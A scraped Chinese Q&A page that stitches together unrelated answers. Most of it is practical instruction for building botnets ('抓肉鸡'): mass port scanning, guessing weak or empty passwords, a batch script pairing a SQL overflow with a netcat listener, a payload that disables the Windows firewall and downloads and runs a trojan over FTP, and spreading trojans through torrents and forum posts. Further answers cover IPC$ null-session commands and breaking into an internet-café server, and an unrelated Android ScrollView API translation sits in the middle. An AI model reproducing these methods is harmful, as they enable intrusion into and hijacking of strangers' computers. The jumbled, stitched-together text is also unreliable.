抓肉鸡的11种方法首先得准备,免杀的STAT 或 一只免杀鸽子或者其他的远控,一个免费空间,一些工具(下面会提到)(1)扫3389端口抓肉鸡(适合新手)(抓不了国外肉鸡)现在国内网络上流传着一种克隆版的XP,安装后会默认开启一个账号为new,密码为空的账户,而且基本上都是开着3389的,我们就可以利用这一点来抓肉鸡。首先用端口扫描工具(如S扫)扫一段IP的3389端口,扫完后就直接用远程桌面连接开放3389的机器(也可以把结果保存为文本文件,用批量生成3389连接的工具来连接),然后输入账号new登入,如果别人的电脑前没人的话你就可以去你的空间下载你传好的木马安装拉~~这种方法只针XP系统,如果遇到2000或者2003系统就不要试了呵呵。缺点也很明显,如果别人不是用new账号登入XP的,你再登入上去就会把他挤出去(XP只支持单用户登入,用户登入需要用工具开),或者电脑前有人你就不可能去打开IE下载木马了。(2)扫135端口抓肉鸡首先先用端口扫描器扫一段IP的135端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用recton开telnet传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的135肉鸡,要抓外地的只能用外地的135肉鸡来扫。(详细动画可以去黑客网站搜索135)(3)扫445端口抓肉鸡和扫135抓肉鸡差不多,首先先用端口扫描器扫一段IP的445端口,然后把结果保存,再用NTSCAN过滤有弱口令的机器,最后用啊D工具包开共享传马。因为现在135和445端口都被防火墙屏蔽了,只能扫本地的445肉鸡,要抓外地的只能用外地的445肉鸡来扫。(详细动画可以去黑客网站搜索445)(4)1433端口批量溢出抓肉鸡这个方法可以实现全自动抓鸡要用到的工具:S扫 sqlhello.exe nc.exe批处理文件首先先写个批处理,打开记事本,把以下代码复制修改后,储存为扫描+溢出.bat文件@echo offfor /f "eol=; tokens=1,2 delims= " %%i in (tt.txt) do s.exe tcp %%i %%j 1433 1000 /save@echo offfor /f "eol=; tokens=1 delims= " %%i in (Result.txt) do sqlhello %%i 1433 xxx.xxx.xx.xx 556还要新建一个tt.txt,里面你要扫的IP段,格式为XXX.XXX.XXX.XXX XXX.XXX.XXX.XXX,中间是空格1433是要扫描的端口,1000是扫描线程数 ,do sqlhello %%i 1433 xxx.xxx.xx.xx 556 这个里的XXX添你的IP,556是后面NC监听的端口然后再写个批处理@echo offNc -l -vv -p 556<nc.txt&&%0 这里的556要和上面的保持一致,你也可以改成其他的值,但是2处都要改,然后保存为nc.bat然后再新建一个nc.txt,里面填写溢出成功后让肉鸡下载你木马的代码。这里给出一种代码echo open X.X.X.X(你FTP的IP)>>daima.txtecho username>>daima.txtecho password>>daima.txtecho bin>>daima.txt(以2进制传输数据)echo get xxx.exe(你的木马的文件名,要放在根目录下)>>daima.txtecho bye>>daima.txtnet stop sharedaccess(关闭WINDOWS自带防火墙)ftp -s:daima.txtxxx.exe(也是填你木马的文件名)del daima.txt注意上面的代码回车符别删掉,要不然就没法下你的马了。上面的步骤都搞好后,就可以开始扫肉鸡了。先打开多个NC.bat,然后再打开扫描+溢出.bat,然后你就可以去睡大觉了。自动扫描,扫描完后自动溢出,溢出后还自动下马执行,爽吧!所以这里讲详细点,呵呵。还有42 21端口也可以这样溢出,只要用这些端口的溢出工具就好了,详细动画可以去黑客网站搜索1433。忘了说,上面的工具和批处理什么的都要放在同一个文件夹下。先休息一下,打这么多字累死了继续(5)扫1433抓肉鸡之方法2要用到的工具:端口扫描器 X-scanSQL综合利用工具上面我们说过了,1433溢出现在成功率已经不高了,所以我们可以用另一种方法。开了1433端口的机器一般都装了SQL,所以我们可以猜测SQL弱口令来抓1433肉鸡。首先先用端口扫描器扫一段IP的1433端口,然后结果保存为文本文件,接着用X-scan导入这些开了1433的IP,然后在扫描参数-全局设置-扫描模块这一栏里只勾上SQL-SERVER就可以了,其他不要勾。然后在插件设置-端口相关设置-待检测端口这一栏,只填1433端口。然后就可以开始扫描了。扫描完成后会有个报告,列出了有弱口令的机器,然后打开SQL综合利用工具,输入你扫到的弱口令来连接,接着打开SQL综合利用工具-利用目录,上传你的木马,然后在用DOS命令执行你的木马就OK了。(6)用WINNTAutoAttack扫SA弱口令抓肉鸡工具:WINNTAutoAttack SQL综合利用工具打开WINNTAutoAttack,找一段IP添上,然后只勾上设置下的仅对PING检查成功的机器进行检测和SQL列出密码为空的SA账号,接着开始扫描,扫完后,用 SQL综合利用工具连上传马执行就好了。(7)扫4899空口令抓肉鸡工具:端口扫描器 4899探测器 Radmin首先先用端口扫描器扫一段IP的4899端口,然后用4899探测器导入开了4899端口的IP,接着扫空令,最后用Radmin连接有空口令的机器,带开文件管理,上传的你木马运行就OK了。详细动画可以去黑客网站搜索4899(8)扫5900端口抓VNC肉鸡工具:VNC扫描器 VNC连接器首先用VNC扫描器扫描一段IP,扫描格式为vscan.exe(扫描器文件名) -i 219.0.0.0-219.255.255.255(扫描IP段) -p 5900 -vnc -vv扫描完成后会在扫描器所在的同一文件夹生成一个文本文件,打开后有一列IP,IP后面的有一些单词比如patched,banned,vulnerable,只有单词为vulnerable才能连接。接着就用VNC连接器连接,下面就不用多说了吧? 详细动画可以去黑客网站搜索VNC接下来说说挂马抓肉鸡吧。方法有很多,比如BT挂马、免费空间挂马、迅雷挂马等等,有些我也还不会,呵呵。下面就介绍几种我会的。(9)BT挂马顾名思义,就是把你的木马发布到BT网站让人下载。当然如果只把单纯的木马文件发布上去效果肯定不好,而且现在一般的BT网站也不让发布EXE文件。所以我们需要一些隐藏的手法。我们可以先把木马用捆绑器和一些电影、音乐、游戏捆绑在一起,再压缩成RAR文件发布,谁在开始下载时会知道RAR里有木马呢?当他费了好大劲下载完,打开发现是EXE的格式后,总有些菜鸟会不想辜负自己花费的时间而忍不住打开吧?尤其是下XXX片的时候当然你也可以做个网页木马,然后把你网页木马的地址插入到你发布的文件中(不是所有文件都可以这样的,我只知道RM和EXE文件可以插入),别人下载打开后同时也会带开你的网页木马,如果他的系统没有补供你网页木马所利用的漏洞的话,那他就会中你的马了。有些朋友可能会想,我把木马和其他文件捆绑后格式保持为那个文件(比如RM捆绑木马后保持RM格式),那样别人不就不会怀疑了吗?呵呵,如果真有这样的好事那我上面何不说把木马和BT种子文件绑在一起发布,那样你肉鸡不抓疯了才怪~~所以在这里说一下,木马和其他文件捆绑后生成的文件只能为EXE格式的,除非你有你所捆绑文件的格式的溢出漏洞,那样才能把生成后的文件格式保持为你所捆绑文件的格式。不过这样的漏洞现在很少,大多都被补了,就算有别人也不一定会公开,为什么想想就知道了吧。在这里就说一个最近的RAR溢出漏洞,针对winrar3.6版本以下的所有版本,只要你winrar版本低于3.6,运行绑了牧马的RAR文件后就会中马。此类木马症状为:运行RAR文件后会弹出一个什么什么损坏还是错误的对话框,然后RAR文件体积变小,减少的体积就为木马的体积。然后再次打开这个RAR文件一切正常,不会弹出错误对话框。在这里提醒下各位赶快更新下WINRAR版本,小心中马哈。(10)免费空间挂马其实和BT差不多,就是把做好的木马上传到你申请的免费空间,然后到论坛发些诱惑性的帖子让别人下载你的木马。优点是不用像BT那样做种子,那样不仅要开着电脑,还影响网速。我这几天就是这样挂的,弄个免费空间,上传个木马,到2个XXX论坛发个帖子,每天睡前一顶,才挂了几天,现在每天肉鸡都保持在40-60只。而且大部分都是美国的(11)用RM在论坛挂马首先你弄个只有几秒钟的RM文件,然后插入你的网页木马,接着上传到你的空间,然后到一些支持插入RM连接的论坛发帖子,点插入real media 播放器,输入你的RM牧马地址,然后高度宽度都设为1(这部是为了保证隐蔽性 ),然后点发贴,这样别人在浏览你的帖子就会运行你的RM木马,而我们前面把高和宽设为1,在帖子里RM连接就看不到了。这样别人就不知不觉中了我们的马了 好像FLASH木马也可以这样的,我没试过,大家可以去研究下。
2023-06-28 05:26:043

如何使用ScrollView

填充图案的定义也有两种,一种是按毫米定义的,一种是按英寸定义的,在公制图纸中通常是按毫米定义的。一、结构public class ScrollView extends FrameLayoutjava.lang.ObjectAndroid.view.Viewandroid.view.ViewGroupandroid.widget.FrameLayoutandroid.widget.ScrollView二、概述一种可供用户滚动的层次结构布局容器,允许显示比实际多的内容。ScrollView是一种FrameLayout,意味需要在其上放置有自己滚动内容的子元素。子元素可以是一个复杂的对象的布局管理器。通常用的子元素是垂直方向的LinearLayout,显示在最上层的垂直方向可以让用户滚动的箭头。TextView类也有自己的滚动功能,所以不需要使用ScrollView,但是只有两个结合使用,才能保证显示较多内容时候的效率。但只有两者结合使用才可以实现在一个较大的容器中一个文本视图效果。ScrollView只支持垂直方向的滚动。三、构造函数public ScrollView (Context context)创建一个默认属性的ScrollView实例public ScrollView (Context context, AttributeSet attrs)创建一个带有attrs属性的ScrollView 实例。public ScrollView (Context context, AttributeSet attrs, int defStyle)创建一个带有attrs属性,并且指定其默认样式的ScrollView实例。四、公共方法public void addView (View child)添加子视图。如果事先没有给子视图设置layout参数,会采用当前ViewGroup的默认参数来设置子视图。参数child 所添加的子视图public void addView (View child, int index)添加子视图。如果事先没有给子视图设置layout参数,会采用当前ViewGroup的默认参数来设置子视图。参数child 所添加的子视图index 添加子视图的位置public void addView (View child, int index, ViewGroup.LayoutParams params)根据指定的layout参数添加子视图参数child 所添加的子视图index 添加子视图的位置params 为子视图设置的layout参数public void addView (View child, ViewGroup.LayoutParams params)根据指定的layout参数添加子视图。参数child 所添加的子视图params 为子视图设置的layout参数public boolean arrowScroll (int direction)响应点击上下箭头时对滚动条滚动的处理。参数direction 按下的箭头所对应的方向返回值如果我们处理(消耗)了此事件返回true,否则返回false。public void computeScroll ()被父视图调用,用于必要时候对其子视图的值(mScrollX和mScrollY)进行更新。典型的情况如:父视图中某个子视图使用一个Scroller对象来实现滚动操作,会使得此方法被调用。public boolean dispatchKeyEvent (KeyEvent event)发送一个key事件给当前焦点路径的下一个视图。此焦点路径从视图树的顶层执行直到当前焦点视图。如果此视图为焦点视图,将为自己发送。否则,会为当前焦点路径的下一个节点发送。此方法也会激起一个key监听器。参数event 发送的key事件返回值事件被处理返回true,否则返回false。public void draw (Canvas canvas)手动绘制视图(及其子视图)到指定的画布(Canvas)。这个视图必须在调用这个函数之前做好了整体布局。当实现一个视图时,不需要继承这个方法;相反,你应该实现onDraw(Canvas)方法。参数canvas 绘制视图的画布public boolean executeKeyEvent (KeyEvent event)当接收到key事件时,用户可以调用此函数来使滚动视图执行滚动,类似于处理由视图体系发送的事件。参数event 需要执行key的事件返回值事件被处理返回true,否则返回false。public void fling (int velocityY)滚动视图的滑动(fling)手势。(译者注: 如何监听android的屏幕滑动停止事件)参数velocityY Y方向的初始速率。正值表示手指/光标向屏幕下方滑动,而内容将向上滚动。public boolean fullScroll (int direction)对响应“home/end”短按时响应滚动处理。此方法将视图滚动到顶部或者底部,并且将焦点置于新的可视区域的最顶部/最底部组件。若没有适合的组件做焦点,当前的ScrollView会收回焦点。参数direction滚动方向:FOCUS_UP表示视图向上滚动;FOCUS_DOWN表示视图向下滚动返回值若key事件被消耗(consumed)返回true,其他情况返回false。public int getMaxScrollAmount ()返回值当前滚动视图响应箭头事件能够滚动的最大数。public boolean isFillViewport ()指示当前ScrollView的内容是否被拉伸以填充视图可视范围(译者注:viewport可视范围,参见决定Scrollviewer里面Control的可视范围)。返回值内容填充视图返回true,否则返回false。public boolean isSmoothScrollingEnabled ()返回值按箭头方向滚动时,是否显示滚动的平滑效果。public boolean onInterceptTouchEvent (MotionEvent ev)实现此方法是为了拦截所有触摸屏幕时的运动事件。可以像处理发送给子视图的事件一样去监视这些事件,并且获取当前手势在任意点的ownership使用此方法时候需要注意,因为它与View.onTouchEvent(MotionEvent)有相当复杂的交互,并且前提需要正确执行View.onTouchEvent(MotionEvent)。事件将按照如下顺序接收到:1. 收到down事件2. Down事件或者由视图组的一个子视图处理,或者被用户自己的onTouchEvent()方法处理;此处理意味你应该执行onTouchEvent()时返回true,这样才能继续看到剩下的手势(取代找一个父视图处理)。如果onTouchEvent()返回true时,你不会收到onInterceptTouchEvent()的任何事件并且所有对触摸的处理必须在onTouchEvent()中发生。3. 如果此方法返回false,接下来的事件(up to and including the final up)将最先被传递当此,然后是目标的onTouchEvent()。4. 如果返回true,将不会收到以下任何事件:目标view将收到同样的事件但是会伴随ACTION_CANCEL,并且所有的更进一步的事件将会传递到你自己的onTouchEvent()方法中而不会再在这里出现。参数ev 体系向下发送的动作事件返回值如果将运动事件从子视图中截获并且通过onTouchEvent()发送到当前ViewGroup ,返回true。当前目标将会收到ACTION_CANCEL事件,并且不再会有其他消息传递到此。(译者注:onInterceptTouchEvent和onTouchEvent调用时序)public boolean onTouchEvent (MotionEvent ev)执行此方法为了处理触摸屏幕的运动事件。参数ev 运动事件返回值事件被处理返回true,其它返回false。public boolean pageScroll (int direction)响应短按“page up/ down”时候对滚动的处理。此方法将向上或者向下滚动一屏,并且将焦点置于新可视区域的最上/最下。如果没有适合的component作为焦点,当前scrollView将收回焦点。参数direction 滚动方向:FOCUS_UP表示向上翻一页,FOCUS_DOWN表示向下翻一页。返回值此key事件被消耗(cosumed)返回true,其他返回false。public void requestChildFocus (View child, View focused)当父视图的一个子视图的要获得焦点时,调用此方法。参数child 要获得焦点的父视图的子视图。此视图包含了焦点视图。如果没有特殊徐要求,此视图实际上就是焦点视图。focused 子视图的子孙视图并且此子孙视图是真正的焦点视图public boolean requestChildRectangleOnScreen (View child, Rect rectangle, boolean immediate)当组里的某个子视图需要被定位在屏幕的某个矩形范围时,调用此方法。重载此方法的ViewGroup可确认以下几点:* 子项目将是组里的直系子项* 矩形将在子项目的坐标体系中重载此方法的ViewGroup应该支持以下几点:* 若矩形已经是可见的,则没有东西会改变* 为使矩形区域全部可见,视图将可以被滚动显示参数child 发出请求的子视图rectangle 子项目坐标系内的矩形,即此子项目希望在屏幕上的定位immediate 设为true,则禁止动画和平滑移动滚动条返回值进行了滚动操作的这个组(group),是否处理此操作。public void requestLayout ()当有改变引起当前视图重新布局时,调用此函数。它将规划一个视图树的layout路径。public void scrollTo (int x, int y)设置当前视图滚动到的位置。此函数会引起对onScrollChanged(int, int, int, int)函数的调用并且会让视图更新。当前版本取消了在子视图中的滚动。参数x 滚动到的X位置y 滚动到的Y位置public void setFillViewport (boolean fillViewport)设置当前滚动视图是否将内容高度拉伸以填充视图可视范围(译者注:viewport可视范围,参见决定Scrollviewer里面Control的可视范围)。参数fillViewport 设置为true表示拉伸内容高度来适应视口边界;其他设为false。public void setOverScrollMode (int mode)为视图设置over-scroll模式。有效的over-scroll模式有OVER_SCROLL_ALWAYS(缺省值),OVER_SCROLL_IF_CONTENT_SCROLLS(只允许当视图内容大过容器时,进行over-scrolling)和OVER_SCROLL_NEVER。只有当视图可以滚动时,此项设置才起作用。(译者注:这个函数是2.3 r1 中新增的,API Level 9。关于over-scroll这里译为弹性滚动,即,参见帖子:类似iPhone的弹性ListView滚动)参数mode The new over-scroll mode for this view.public void setSmoothScrollingEnabled (boolean smoothScrollingEnabled)用来设置箭头滚动是否可以引发视图滚动。参数smoothScrollingEnabled 设置箭头滚动是否可以引起内容的滚动的bool值public final void smoothScrollBy (int dx, int dy)类似于scrollBy(int, int),但是滚动时候是平缓的而不是立即滚动到某处。参数dx 在X方向滚动的像素数dy 在Y方向滚动的像素数public final void smoothScrollTo (int x, int y)类似于scrollTo(int, int),但是滚动时候是平缓的而不是立即滚动到某处。参数x 要滚动到位置的X坐标y 要滚动到位置的Y坐标五、受保护方法protected int computeScrollDeltaToGetChildRectOnScreen (Rect rect)计算X方向滚动的总合,以便在屏幕上显示子视图的完整矩形(或者,若矩形宽度超过屏幕宽度,至少要填满第一个屏幕大小)。参数rect 矩形返回值滚动差值protected int computeVerticalScrollOffset ()计算垂直方向滚动条的滑块的偏移。此值用来计算滚动条轨迹的滑块的位置。范围可以以任意单位表示,但是必须与computeVerticalScrollRange()和computeVerticalScrollExtent()的单位一致。缺省的偏移是在当前视图滚动的偏移。返回值滚动条的滑块垂直方向的偏移。protected int computeVerticalScrollRange ()滚动视图的可滚动范围是所有子元素的高度。返回值由垂直方向滚动条代表的所有垂直范围,缺省的范围是当前视图的画图高度。protected float getBottomFadingEdgeStrength ()返回滚动底部的能见度。能见度的值的范围是0.0(没有消失)到1.0(完全消失)之间。缺省的执行返回值为0.0或者1.0,而不是他们中间的某个值。滚动时子类需要重载这个方法来提供一个平缓的渐隐的实现。返回值滚动底部能见度,值的范围在浮点数0.0f到1.0f之间。protected float getTopFadingEdgeStrength ()返回滚动顶部的能见度。能见度的值的范围是0.0(没有消失)到1.0(完全消失)之间。缺省的执行返回值为0.0或者1.0,而不是他们中间的某个值。滚动时子类需要重载这个方法来提供一个平缓的渐隐的实现。返回值滚动顶部能见度,值的范围在浮点数0.0f到1.0f之间。protected void measureChild (View child, int parentWidthMeasureSpec, int parentHeightMeasureSpec)要求当前视图的一个子视图测量自己,同时兼顾到当前视图的MeasureSpec的要求和它的空白。子视图必须有MarginLayoutParams。比较复杂的工作是在getChildMeasureSpec中完成的。参数child 需要自己测量的子视图parentWidthMeasureSpec 当前视图要求的宽度parentHeightMeasureSpec 当前视图要求的宽度protected void measureChildWithMargins (View child, int parentWidthMeasureSpec, int widthUsed, int parentHeightMeasureSpec, int heightUsed)要求当前视图的一个子视图测量自己,同时兼顾到当前视图的MeasureSpec的要求和它的空白和边界。子视图必须有MarginLayoutParams。比较复杂的工作是在getChildMeasureSpec中完成的。参数child 需要测量的子视图parentWidthMeasureSpec 当前视图要求的宽度widthUsed 水平方向上由父视图使用的空白 (也可能是视图的其他子视图使用的)parentHeightMeasureSpec 当前视图要求的宽度heightUsed 垂直方向上由父视图使用的空白 (也可能是视图的其他子视图使用的)protected void onLayout (boolean changed, int l, int t, int r, int b)当前视图需要为子视图分配大小和位置时候调用,子类继承必须要重载此方法并调用自己子视图的layout函数。参数changed 当前视图的新的大小或者位置l 相对父视图,左边界位置t 相对父视图,上边界位置r 相对父视图,右边界位置b 相对父视图,下边界位置protected void onMeasure (int widthMeasureSpec, int heightMeasureSpec)测量视图以确定其内容宽度和高度。此方法被measure(int, int)调用。需要被子类重写以提供对其内容准确高效的测量。约定:当重写此方法时,你必须调用setMeasuredDimension(int, int)来保存当前视图view的宽度和高度。不成功调用此方法将会导致一个IllegalStateException异常,是由measure(int, int)抛出。所以调用父类的onMeasure(int, int)方法是必须的。父类的实现是以背景大小为默认大小,除非MeasureSpec(测量细则)允许更大的背景。子类可以重写onMeasure(int,int)以对其内容提供更佳的尺寸。如果此方法被重写,那么子类的责任是确认测量高度和测量宽度要大于视图view的最小宽度和最小高度(getSuggestedMinimumHeight() 和 getSuggestedMinimumWidth()),使用这两个方法可以取得最小宽度和最小高度。参数widthMeasureSpec 受主窗口支配的水平空间要求。这个需求通过 View.MeasureSpec.进行编码。heightMeasureSpec 受主窗口支配的垂直空间要求。这个需求通过 View.MeasureSpec.进行编码。protected void onOverScrolled (int scrollX, int scrollY, boolean clampedX, boolean clampedY)被overScrollBy(int, int, int, int, int, int, int, int, boolean)调用,来对一个over-scroll操作的结果进行响应。(译者注:这个函数是2.3 r1 中新增的,API Level 9)参数scrollX 新的X滚动像素值scrollY 新的Y滚动像素值clampedX 当scrollX被over-scroll的边界限制时,值为trueclampedY 当scrollY被over-scroll的边界限制时,值为trueprotected boolean onRequestFocusInDescendants (int direction, Rect previouslyFocusedRect)当在滚动视图的子视图中查找焦点视图时,需要注意不要将焦点设置在滚动出屏幕外的控件上。此方法会比执行缺省的ViewGroup代价高,否则此行为也会设置为缺省参数direction 指定下列常量之一:FOCUS_UP, FOCUS_DOWN, FOCUS_LEFT, FOCUS_RIGHTpreviouslyFocusedRect 能够给出一个较好的提示的矩形(当前视图的坐标系统)表示焦点从哪里得来。如果没有提示为null。返回值是否取得了焦点protected void onSizeChanged (int w, int h, int oldw, int oldh)布局期间当视图的大小发生改变时调用。如果只是添加到视图,调用时显示的是旧值0。(译者注:也就是添加到视图时,oldw和oldh返回的是0)。参数w 视图当前宽度h 视图当前高度oldw 视图改变前的宽度oldh 视图改变前的高度
2023-06-28 05:26:191

135抓鸡教程详细

日抓千日肉鸡教程http://player.56.com/v_NjcyODg3Nzg.swf教程给你看学抓鸡我建议你Msnda去培训,我就是从那里学的,而且好多攻防黑客教程还有黑客攻防光盘教程从百度直接搜索“Msnda”就可以了,而且还送八位QQ号呢其实我个人觉得既然想学习网络安全,那你必然懂得网络黑手的攻击性,就好比你想防小偷不偷你家的东西财产,但你必然要懂得小偷的一些手法,他们的一些的作案行为,如何去更好防范他。随着时代的发展,互联网给大家带来了便利,越来越离不开网络,但是网络它也有另一面,我们可能遇到过,比如qq被盗、游戏账号被盗,电脑资料莫名奇妙的消失,我们常规的见到电脑有大量的病毒。甚至网银被盗,都是引网络的安全性造成的。
2023-06-28 05:26:272

外网可以扫描肉鸡吗?如果不行该怎么做

用杀毒软件一般都可以查出
2023-06-28 05:26:342

如何入侵网吧主机

网吧主机不可能没密码的,随便那个网管都有这点常识的,绝对会设置密码的,并且网吧主机一般都装Server2003的系统,这种电脑系统对密码的要求比较高,系统会要求用户把密码设置得复杂一点,设置得太简单系统就不接受。你能扫描到主机网吧的主机IP,可能是他的防火墙没开,或者你是在他网吧里扫描到他的主机IP的,在他自己网吧的机子那是属于局域网,有些东西需要共享,象电影之内的东西都会共享,所以你在他网吧的任何一台机子上都应该可以扫描到主机的IP。知道主机IP,和管理员密码就可以进行远程控制,WINDOWSXP有自带的远程控制程序象“远程桌面”就是一种,远程桌面位置一般在“开始”-->附属程式-->通讯-->远程桌面。也可以到网上下载"DameWare"这个远程控制软件。如果只是想连到主机的C盘里的话,(如果主机IP为192.168.10.2)那就在开始-->运行里输入\192.168.10.2c$再按回车就会弹出对话框让你输入对方的管理员密码,你如果能知道密码那么就可以进入主机的C盘了.也可以使用DOS命令对主机进行一些远程操作,比如想让主机关机/重启/注销,那么就在运行里输入CMD再按回车,再输入shutdown-i再按回车就会弹出对话框让你操作,你只要在对话框里添加主机的IP,再在最下面的消息对话框里随便输入一些字按确定就可以使主机关机/重启/注销(不过这种命令只能在XP系统里使用)
2023-06-28 05:26:542

运行时错误-2147024894(80070002)Automation错误怎么回事

重装WINRAR 就好了
2023-06-28 05:27:012

什么是肉鸡,如何抓肉鸡

什么是肉鸡肉鸡也称傀儡机,是指可以被黑客远程控制的机器。它们被黑客攻破或用户自己不小心,种植了木马,黑客可以随意操纵它并利用它做任何事情。肉鸡通常被用作DDOS攻击。可以是各种系统,如windows、linux、unix等,更可以是一家公司、企业、学校甚至是政府军队的服务器。也可以这么说,黑客在攻击别人的机器的时候怕人家IP跟踪的时候发现是他,于是就找了一些机器来,从他的机器上去做一些想做的事,这样就增加了IP反追踪的难处,他们把这些已经被上传了木马程序,留下了后门,或者知道了“管理员”密码的机器称之为“肉鸡”如何抓肉鸡一般XP都很难扫不出IP,先要突破一下,可以用工具是使xp支持syn扫描,运行就重启。线程就可以达到10240,然后将每次扫描,关闭防火墙命令是"net stop sharedaccess",一般都可以扫出IP,如果还不行,换个IP段。扫描环境:一般都是XP系统,但其实扫描IP速度很慢,而且扫不多。建议抓鸡最好用服务器,服务器指2003系统,因为2003系统扫描速度快,而且扫到很多IP,是很好的抓鸡系统。抓鸡方法135端口,先扫描135IP,然后整理!然后用NTscan,扫描弱口令,最后用Recton上传木马,自动运行的。因为这个漏洞很久,所以端口也很少的了。如果整理IP不好,就很难扫出弱口令。1433端口,先扫描1433IP,然后整理!然后用X-Scan-v3.3,扫描模块只选择SQL-Server弱口令,然后扫出漏洞主机,再用SQLTools.exe连接,看看能不能执行DOS,如果不能就修复下,可以用“SQL查询分析器修正分离版”,修复命令我会打包的了。3389端口,先扫描3389IP,然后用远程桌面连接,一个一个IP添加进入,见到XP,用户new密码为空进入,然后下载木马!见到2000,用户administrator密码为空进入然后下载木马!4899端口,先扫描4899IP,然后整理!然后用4899探测器,A导入4899IP,然后开始搜索,B就是空口令的IP了,然后用Radmin,点连接到,把刚才扫到的空口令的IP添到IP地址那里,点确定,然后自己上传马,用DOS运行。5900端口,用领域小组专版VNC扫描器,这个端口有些特别,不同其他的端口,所以扫IP工具也不同,扫到IP,看看有无V字开头,然后用VNCLink连接,自己然后下载马拉!80端口,先扫描80IP,然后整理,再用apache/" target="_blank">Apache Tomcat导入IP,端口8080改为80,等IP全部导完,点开始就可以,你看看有无一些网站结尾是HTML或者很长的,就可以进入这个网,然后上传个“hcskk.war”然后点hcskk.war进入,就可以自己下载木马,再用DOS运行。免杀木马,抓鸡一定要个免杀木马,不然就抓不到的,先要学会免杀,那就容易抓到鸡拉!不会可以先学定位,用CCM修改就OK了。 标签: 什么是肉鸡如何抓肉鸡
2023-06-28 05:27:102

谁能翻译这些英文

这是一种茶的使用说明,翻译如下:使用说明: 把茶袋放入杯子并用80度热水冲泡。浸泡1-2分钟,然后拿掉茶袋,尽情品味来自鱼米之乡的东山茶。
2023-06-28 05:27:282

常见端口入侵

端口漏洞:相信去年很多Windows 2000和Windows XP用户都中了“冲击波”病毒,该病毒就是利用RPC漏洞来攻击计算机的。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。该漏洞会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。 1:用139端口入侵 我们先确定一台存在139端口漏洞的主机。用扫描工具扫描!比如SUPERSCAN这个端口扫描工具。假设现在我们已经得到一台存在139端口漏洞的主机,我们要使用nbtstat -a IP这个命令得到用户的情况!现在我们要做的是与对方计算机进行共享资源的连接。 用到两个NET命令,下面就是这两个命令的使用方法 NET VIEW? 作 用:显示域列表、计算机列表或指定计算机的共享资源列表。? 命令格式:net view [\computername | /domain[:domainname]]? 参数介绍:? <1>键入不带参数的net view显示当前域的计算机列表。? <2>\computername 指定要查看其共享资源的计算机。? <3>/domain[:domainname]指定要查看其可用计算机的域?NET USE? 作用:连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息。? 命令格式:net use [devicename | *] [\computernamesharename[volume]]? [password | *]] [/user:[domainname]username] [[/delete] |? [/persistent:{yes | no}]]? 参数介绍:? 键入不带参数的net use列出网络连接。? devicename指定要连接到的资源名称或要断开的设备名称。? \computernamesharename服务器及共享资源的名称。? password访问共享资源的密码。? *提示键入密码。 /user指定进行连接的另外一个用户。? domainname指定另一个域。? username指定登录的用户名。? /home将用户连接到其宿主目录? /delete取消指定网络连接。? /persistent控制永久网络连接的使用。? C: et use \IP C: et view \IP 我们已经看到对方共享了他的C,D,E三个盘 我们要做的是使用NBTSTAT命令载入NBT快取. c:>nbtstat –R 载入NBT快取 c:>nbtstat –c 看有无载入NBT快取 现在我们已经得到的139端口漏洞的主机IP地址和用户名,现在就该是我们进入他计算的时候了,点击开始---查找--计算机,将刚才找到的主机名字输入到上面,选择查找,就可以找到这台电脑了!双击就可以进入,其使用的方法和网上领居的一样。 2:4899端口入侵 用4899过滤器.exe,扫描空口令的机器
2023-06-28 05:27:371

求个绿色无毒的免注册版Recton v2.5

黑客软件本来杀毒软件就要对付的,不一定就是病毒木马咯可以自己做个免杀咯或者排除在外
2023-06-28 05:27:441

为什么无法建立ipc连接

1 首先,我们先建立一个空连接(当然,这需要目标开放ipc$) 命令:net use \ipipc$ "" /user:"" 注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。 2 查看远程主机的共享资源 命令:net view \ip 解释:前提是建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下面的结果,但此命令不能显示默认共享。 在 \*.*.*.*的共享资源 资源共享名 类型 用途 注释 ----------------------------------------------------------- NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成。 3 查看远程主机的当前时间 命令: net time \ip 解释:用此命令可以得到一个远程主机的当前时间。 4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT) 命令:nbtstat -A ip 用此命令可以得到一个远程主机的NetBIOS用户名列表,返回如下结果: Node IpAddress: [*.*.*.*] Scope Id: [] NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- SERVER <00> UNIQUE Registered OYAMANISHI-H <00> GROUP Registered OYAMANISHI-H <1C> GROUP Registered SERVER <20> UNIQUE Registered OYAMANISHI-H <1B> UNIQUE Registered OYAMANISHI-H <1E> GROUP Registered SERVER <03> UNIQUE Registered OYAMANISHI-H <1D> UNIQUE Registered ..__MSBROWSE__.<01> GROUP Registered INet~Services <1C> GROUP Registered IS~SERVER......<00> UNIQUE Registered MAC Address = 00-50-8B-9A-2D-37 以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在Event Log中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么? 五 ipc$所使用的端口 首先我们来了解一些基础知识: 1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务; 2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。 3 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。 有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了: 对于win2000客户端(发起端)来说: 1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败; 2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。 对于win2000服务器端来说: 1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING); 2 如果禁止NBT,那么只有445端口开放。 我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。 六 ipc管道在hack攻击中的意义 